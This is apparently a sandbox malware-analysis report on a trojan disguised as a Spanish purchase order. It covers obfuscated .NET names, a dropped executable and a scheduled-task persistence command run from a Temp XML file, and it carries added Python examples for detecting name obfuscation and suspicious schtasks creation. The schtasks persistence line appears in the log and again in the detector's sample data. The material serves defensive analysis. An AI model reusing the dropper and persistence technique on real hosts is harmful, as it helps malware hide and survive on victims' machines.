Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, QamEXCqfkXltIZ5rPn.cs | High entropy of concatenated method names: 'M9oSsllAed', 'QRESKmWA0n', 'L2AS5ymeUl', 'QKkSqtogOo', 'FxhSjCXYWa', 'kxqSxpTdm8', 'GVBSYSXgoR', 'CqsS1sGSTA', 'z8HSnx93Fw', 'MjJSJ24CIR'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, R8McbU4p0CIa2MEB4H1.cs | High entropy of concatenated method names: 'INiJlS2nw2', 'fnlJOIGs6m', 'Rs4JoX7JUB', 'Ue37OZkOaklSOuDr8GZ', 'LSGP3QktNoquqxZfiMR', 'fh5fjQkmrgITS7wUtxB', 'inKkqskDCWmnGAQpK6n', 'oCaukYk9AaFALGt92yv'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, QQR1QDfeflhLhnewFd.cs | High entropy of concatenated method names: 'H8wZIQgwHn', 'u8LZSWd3xI', 'f7KZMGDXZp', 'A1xMuKevJD', 'KNlMzNskHn', 'UEHZaGdQPw', 'ceQZ4gVFj3', 'U5LZpo23m9', 'm8CZVlyrVJ', 'o5BZecfZl9'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, psEjOm9jBmrmsejYFy.cs | High entropy of concatenated method names: 'DNWjAPWNXF', 'CZPjL4am5R', 'Cpuj9Zu8Nc', 'XfejPoNS0d', 'ObOjtNymp6', 'mvrjTWcwQk', 'U1ljmIiuvv', 'h0BjrjZ2e0', 'ouGjgb8aXZ', 'YLAjfXSSyc'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, UesNoGyEPg1T0aorW0.cs | High entropy of concatenated method names: 'EZn1IyOX1J', 'ThZ1cePcUY', 'Bv71SFd03Q', 'CkO1CinpAj', 'oTV1M6yBd8', 'bPJ1ZaVjLK', 'tfK17apPuB', 'FUX1dHlOWU', 'QvV1FNnIZ7', 'nNs1UUY8rQ'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, uvbrjyBpB6IQ1sZIM7.cs | High entropy of concatenated method names: 'XmcYyCgEgh', 'bZIYu3Su7K', 'jf61a1NVEv', 'u6C14YvjuG', 'kNlYE4qxI5', 'JRXYLCW98e', 'QxFYDTPIir', 'Rx3Y9n5pwQ', 'xuAYPafBcj', 'uB1YW4M3rv'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, kp8qwk5XbcOdplPSn8.cs | High entropy of concatenated method names: 'jXUc9RKeh5', 'g5TcPbkMnS', 'sOxcWyVtaf', 'wkNc2hj4t6', 'XTRck4hGdf', 'vDCcBCZJOY', 'f5IcvBljxq', 't0ccy4RoQi', 'gS1c06YcH6', 'Vj6cuYtacJ'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, uDC5hthEYXnM7oO39Y.cs | High entropy of concatenated method names: 'dpjZlynISn', 'JZ6ZOhNRt1', 'YuTZoUvQnZ', 'XUfZsxCHNo', 'k55ZQMuMCv', 'li8ZKaBMSK', 'X8YZR8Ynwr', 'kXVZ5p05Ld', 'yHJZq8oKuw', 'sbjZinhRh6'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, xgm5voicFPk8sZLg9L.cs | High entropy of concatenated method names: 'XRaCQd1oIU', 'c4KCRk3TRG', 'E8uSTA8iTZ', 'mbySmwGEpL', 'Ox7SrfZTAy', 'cqSSgHpU7a', 'P6YSfeQbgM', 'PmNSHBJjrm', 'uVcShEQ3e0', 'xmxSAQaR1K'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, b4IOm7cKnfrLa3GBlb.cs | High entropy of concatenated method names: 'Dispose', 'nAs40YGSoZ', 'JVgptDd43p', 'hgfEE2TYlq', 'Uke4usNoGE', 'Rg14zT0aor', 'ProcessDialogKey', 'S0xpaGHbeS', 'vtIp4ufXep', 'KXXppB9QAg'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, qlDLMdzah6XGe81ZR4.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pXwn8AxVdQ', 'cESnjDjyIt', 'UXunxURNEB', 'cqAnYwSAn5', 'cFXn1xIknu', 'SCnnnb8dse', 'knonJ3Uobt'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, OyOqeoeatmsG22RUyf.cs | High entropy of concatenated method names: 'JK74Zp8qwk', 'xbc47OdplP', 'ifk4FXltIZ', 'ErP4UnXgm5', 'jLg4j9L5Fc', 'WOW4xUDLkZ', 'u60HwKfUDb37IZVlHn', 'DrYVWGVS84EdjnPx01', 'nQN44tyf4V', 'Qjw4VVuUlL'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, M5tu5eScEBZf24uGb6.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Nynp0FqCwa', 'HHjpuVkpPt', 'gQppzx1Q4N', 'LCBVaOcCQP', 'DwJV4PxuYd', 'cZrVpMljnu', 'Xc7VVjpe1A', 'URQe9pssTfI53BD6l98'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, DFcyOWbUDLkZIX04JR.cs | High entropy of concatenated method names: 'BXnMNtI8DI', 'gbFMcPorB4', 'POoMCB0x07', 'oDNMZYEao4', 'tGBM7ZW2aZ', 'QPCCkSOuiw', 'zhZCBUn3tM', 'vjuCvT8ZL1', 'mOYCyTjkjS', 'opvC0gPN0C'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, dSPneu4Vjx6HTGfCEdG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WagJ9Nlr8b', 'u3QJP5YZQR', 'nFdJWjt40G', 'fQyJ2BNJGd', 'bQ7JkLwtH5', 'ULlJBjRCBx', 'D1wJvX5WjN'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, JSMvQGDlHAfTwMe3ZO.cs | High entropy of concatenated method names: 'RKF85RQHxR', 'xJs8qOVEqg', 'X048bi6C1U', 'QOR8tpwed8', 'rPV8mY4mGw', 'me48r4Fys1', 'WKS8f225l4', 'qdL8H5yIdc', 'HGo8AlYwI8', 'K3O8EUDBJE'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, cDToTJpHXBOUtdduer.cs | High entropy of concatenated method names: 'NOBoLeGHI', 'Q2Msr290T', 'HsEKEAcmK', 'pZKRCHrOw', 'jMFqmu74v', 'Xjji3YQsl', 'WM9m99eBqSRaCcgGHi', 'WbDeRUMry9pAMhQX3M', 'dya1Z95KQ', 'ld4J119X2'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, UYJYJc2aCln22jB6Dg.csHigh entropy of concatenated method names: 'oseYFbC1I2', 'mN3YU31JMy', 'ToString', 'NifYIGikQ0', 'W6xYcbNm3d', 'fHBYSpQpQs', 'MQOYCk0jM2', 'nkoYMoiOcK', 'xiaYZhCxcJ', 'cLgY7sE68f'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.csHigh entropy of concatenated method names: 'NS3VNZtKb9', 'tQIVIx3a00', 'jvhVc0sdET', 'BdrVSkZhkC', 'xvdVCJjWvZ', 'uS2VM6infV', 'TgGVZrNLnY', 'cktV7SVccW', 'r8FVdLcM7d', 'MqbVFSVfq0'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, wnrE3F4a8RgEIeqXaee.csHigh entropy of concatenated method names: 'LyZnlp5N1j', 'EO3nOERWBZ', 'PfmnoZ7BrU', 'VxensYm7li', 'HgRnQ8BYyw', 'VjsnKnB0yF', 'S0onREy77Y', 'QR3n5CUn9E', 'MoGnqH6R4H', 'Gggniy6lRY'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, pGHbeS03tIufXepgXX.csHigh entropy of concatenated method names: 'En01brJmA6', 'Pu01thMwkD', 'iR91T8yUmc', 'aYl1mDsonm', 'piD19XPDYI', 'cQi1r1aesW', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, U9QAgVuaOBrXhXAvIx.csHigh entropy of concatenated method names: 'WvJn4PmfSx', 'b9dnVo0fH6', 'jwYneEvJhQ', 'SwSnIWksaR', 'vu4ncmBcj6', 'pVDnCHqkr1', 'nUcnMvBAli', 'ojq1vXiCtA', 'ObG1yCOmE6', 'X4P104GC0v'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, QamEXCqfkXltIZ5rPn.csHigh entropy of concatenated method names: 'M9oSsllAed', 'QRESKmWA0n', 'L2AS5ymeUl', 'QKkSqtogOo', 'FxhSjCXYWa', 'kxqSxpTdm8', 'GVBSYSXgoR', 'CqsS1sGSTA', 'z8HSnx93Fw', 'MjJSJ24CIR'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, R8McbU4p0CIa2MEB4H1.csHigh entropy of concatenated method names: 'INiJlS2nw2', 'fnlJOIGs6m', 'Rs4JoX7JUB', 'Ue37OZkOaklSOuDr8GZ', 'LSGP3QktNoquqxZfiMR', 'fh5fjQkmrgITS7wUtxB', 'inKkqskDCWmnGAQpK6n', 'oCaukYk9AaFALGt92yv'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, QQR1QDfeflhLhnewFd.csHigh entropy of concatenated method names: 'H8wZIQgwHn', 'u8LZSWd3xI', 'f7KZMGDXZp', 'A1xMuKevJD', 'KNlMzNskHn', 'UEHZaGdQPw', 'ceQZ4gVFj3', 'U5LZpo23m9', 'm8CZVlyrVJ', 'o5BZecfZl9'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, psEjOm9jBmrmsejYFy.csHigh entropy of concatenated method names: 'DNWjAPWNXF', 'CZPjL4am5R', 'Cpuj9Zu8Nc', 'XfejPoNS0d', 'ObOjtNymp6', 'mvrjTWcwQk', 'U1ljmIiuvv', 'h0BjrjZ2e0', 'ouGjgb8aXZ', 'YLAjfXSSyc'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, UesNoGyEPg1T0aorW0.csHigh entropy of concatenated method names: 'EZn1IyOX1J', 'ThZ1cePcUY', 'Bv71SFd03Q', 'CkO1CinpAj', 'oTV1M6yBd8', 'bPJ1ZaVjLK', 'tfK17apPuB', 'FUX1dHlOWU', 'QvV1FNnIZ7', 'nNs1UUY8rQ'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, uvbrjyBpB6IQ1sZIM7.csHigh entropy of concatenated method names: 'XmcYyCgEgh', 'bZIYu3Su7K', 'jf61a1NVEv', 'u6C14YvjuG', 'kNlYE4qxI5', 'JRXYLCW98e', 'QxFYDTPIir', 'Rx3Y9n5pwQ', 'xuAYPafBcj', 'uB1YW4M3rv'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, kp8qwk5XbcOdplPSn8.csHigh entropy of concatenated method names: 'jXUc9RKeh5', 'g5TcPbkMnS', 'sOxcWyVtaf', 'wkNc2hj4t6', 'XTRck4hGdf', 'vDCcBCZJOY', 'f5IcvBljxq', 't0ccy4RoQi', 'gS1c06YcH6', 'Vj6cuYtacJ'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, uDC5hthEYXnM7oO39Y.csHigh entropy of concatenated method names: 'dpjZlynISn', 'JZ6ZOhNRt1', 'YuTZoUvQnZ', 'XUfZsxCHNo', 'k55ZQMuMCv', 'li8ZKaBMSK', 'X8YZR8Ynwr', 'kXVZ5p05Ld', 'yHJZq8oKuw', 'sbjZinhRh6'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, xgm5voicFPk8sZLg9L.csHigh entropy of concatenated method names: 'XRaCQd1oIU', 'c4KCRk3TRG', 'E8uSTA8iTZ', 'mbySmwGEpL', 'Ox7SrfZTAy', 'cqSSgHpU7a', 'P6YSfeQbgM', 'PmNSHBJjrm', 'uVcShEQ3e0', 'xmxSAQaR1K'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, b4IOm7cKnfrLa3GBlb.csHigh entropy of concatenated method names: 'Dispose', 'nAs40YGSoZ', 'JVgptDd43p', 'hgfEE2TYlq', 'Uke4usNoGE', 'Rg14zT0aor', 'ProcessDialogKey', 'S0xpaGHbeS', 'vtIp4ufXep', 'KXXppB9QAg'
                      Source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, SU.csHigh entropy of concatenated method names: 'G5s', 'RgtTUJcyZL', 's5u', 'g5f', 'Y5S', 't57', 'Xo0qQH', 'AF', 'tC', 'VE'
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe File created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
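The "High entropy of concatenated method names" entries above are the decompiler's view of an identifier-renaming obfuscator: once the method names of a class are joined end to end, random identifiers such as 'H8wZIQgwHn' give a character distribution far flatter than real English-derived names. The Python below is an added example, not code from Joe Sandbox or from the sample, that reproduces that measurement. It scores the ten names reported for QQR1QDfeflhLhnewFd.cs, the mixed list reported for b4IOm7cKnfrLa3GBlb.cs, and a control list assembled for this example from framework method names that also appear in the report. The 5.0-bit threshold and the 40-character minimum are assumptions of this example; the report does not state the cut-off the sandbox signature uses.

```python
import math
from collections import Counter
from typing import Iterable, List

# Method-name lists. The first two are copied from the entries above
# (classes QQR1QDfeflhLhnewFd.cs and b4IOm7cKnfrLa3GBlb.cs); the third is
# a control assembled for this example from framework method names that
# also appear in the report, standing in for a hand-written class.
OBFUSCATED: List[str] = [
    'H8wZIQgwHn', 'u8LZSWd3xI', 'f7KZMGDXZp', 'A1xMuKevJD', 'KNlMzNskHn',
    'UEHZaGdQPw', 'ceQZ4gVFj3', 'U5LZpo23m9', 'm8CZVlyrVJ', 'o5BZecfZl9',
]
MIXED: List[str] = [
    'Dispose', 'nAs40YGSoZ', 'JVgptDd43p', 'hgfEE2TYlq', 'Uke4usNoGE',
    'Rg14zT0aor', 'ProcessDialogKey', 'S0xpaGHbeS', 'vtIp4ufXep', 'KXXppB9QAg',
]
HAND_WRITTEN: List[str] = [
    'Dispose', 'ProcessDialogKey', 'CanConvertFrom', 'ConvertFrom',
    'ConvertTo', 'ToString', 'Next', 'NextBytes',
]

# Assumed cut-offs for this example; the report does not give the values
# the sandbox signature uses.
ENTROPY_THRESHOLD = 5.0   # bits per character
MIN_CHARS = 40            # below this the estimate is too noisy to score


def shannon_entropy(text: str) -> float:
    """Bits per symbol of the empirical character distribution of text."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def name_entropy(names: Iterable[str]) -> float:
    """Entropy of the method names joined end to end, which is what the
    'High entropy of concatenated method names' check measures."""
    return shannon_entropy("".join(names))


def looks_obfuscated(names: Iterable[str],
                     threshold: float = ENTROPY_THRESHOLD,
                     min_chars: int = MIN_CHARS) -> bool:
    """True when the concatenated names are long enough to score and their
    entropy is at or above the threshold."""
    joined = "".join(names)
    return len(joined) >= min_chars and shannon_entropy(joined) >= threshold


def report(names: Iterable[str], label: str) -> str:
    """One summary line per class, in the spirit of the report entries."""
    names = list(names)
    joined = "".join(names)
    verdict = "OBFUSCATED" if looks_obfuscated(names) else "plain"
    return (f"{label}: {len(names)} names, {len(joined)} chars, "
            f"{name_entropy(names):.2f} bits/char, {verdict}")


if __name__ == "__main__":
    for label, names in (("QQR1QDfeflhLhnewFd", OBFUSCATED),
                         ("b4IOm7cKnfrLa3GBlb", MIXED),
                         ("hand-written control", HAND_WRITTEN)):
        print(report(names, label))
```

Two caveats when reading these hits. A class that overrides framework members keeps readable names such as Dispose and ProcessDialogKey next to generated ones; the check scores the concatenation as a whole, so a handful of real names does not hide the rest, but very short classes (the two-letter names in SU.cs, for instance) give unstable estimates, which is why the example refuses to score fewer than 40 characters. The heuristic is evidence of an obfuscator, nothing more; the unpacked regions it was run over (7e10000.8, 4097d28.3, 2cde9dc.0) are where the payload logic has to be read.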

                      Boot Survival

                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp"
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
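The schtasks.exe line above is the persistence step: a task named Updates\nNdsLvHyWi is registered from an XML definition the sample wrote to the user's Temp directory, and the overview's Sigma hit "Scheduled temp file as task from temp location" is this same event. The Python below is an added example, not Joe Sandbox or sample code, that applies that detection logic to process-creation records. The records are constructed in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the first carries the command line reported above, the other two are benign look-alikes written for contrast. The user-writable path pattern, the set of expected parent processes and the rule texts are assumptions of this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records in the shape of Sysmon Event ID 1 (process
# creation). The first command line is the one reported above for this
# sample; the other two are benign look-alikes written for contrast.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "ParentImage": r"C:\Users\user\Desktop\nOrden_de_compra.exe",
        "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" '
                       r'/XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp"',
    },
    {
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks.exe /Create /TN "Backup\Nightly" '
                       r'/TR "C:\Program Files\Backup\run.exe" /SC DAILY /ST 02:00',
    },
    {
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'schtasks.exe /Query /TN "Updates\nNdsLvHyWi" /V /FO LIST',
    },
]

# Locations a standard user can write to (assumed list for this example).
# A task definition or task action living here is the signal the Sigma
# rule keys on: administrators register tasks from program directories.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData\\(Local\\Temp|Roaming)|Windows\\Temp)\\",
    re.IGNORECASE,
)

# Parents that legitimately spawn schtasks.exe (assumed list for this example).
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe",
                    "explorer.exe", "mmc.exe", "svchost.exe"}


def schtasks_arg(cmdline: str, flag: str) -> str:
    """Return the value following /FLAG in a schtasks command line, or ''.

    Accepts a quoted value ("C:\\path with spaces") or a bare token;
    schtasks flags are case-insensitive, so the match is too.
    """
    m = re.search(rf'/{flag}\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def has_flag(cmdline: str, flag: str) -> bool:
    """True when /FLAG appears as a whole token in the command line."""
    return re.search(rf"/{flag}(?=\s|$)", cmdline, re.IGNORECASE) is not None


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like scheduled-task persistence.

    An empty list means no rule fired. Only /Create calls are scored;
    /Query, /Delete and /Run are noise for this purpose.
    """
    cmd = event["CommandLine"]
    if not has_flag(cmd, "Create"):
        return []
    reasons: List[str] = []
    xml = schtasks_arg(cmd, "XML")
    if xml and USER_WRITABLE.search(xml):
        reasons.append("task definition loaded from user-writable temp path")
    action = schtasks_arg(cmd, "TR")
    if action and USER_WRITABLE.search(action):
        reasons.append("task action runs from user-writable path")
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent process {parent}")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and reasons for every event that fired at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        print(f"[{i}] {SAMPLE_EVENTS[i]['CommandLine']}")
        for r in reasons:
            print(f"      - {r}")
```

Two points matter when triaging this on a live host. The image is C:\Windows\SysWOW64\schtasks.exe while the command line names System32: the sample is a 32-bit process, so WOW64 file-system redirection maps the System32 path it asked for onto the SysWOW64 binary, and a rule that compares the two literally will miss it. The tmpD5F2.tmp definition is normally deleted once the task is registered; the persisted copy of the task XML lives under %SystemRoot%\System32\Tasks\Updates\nNdsLvHyWi, with its registration under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Updates\nNdsLvHyWi, and that is where the action and trigger can be read. The report does not show the XML content, so the matching name makes the dropped C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe the likely target, not a confirmed one.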
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exe Process information set: NOOPENFILEERRORBOX (50 identical entries in the report)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (134 identical entries in the report)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
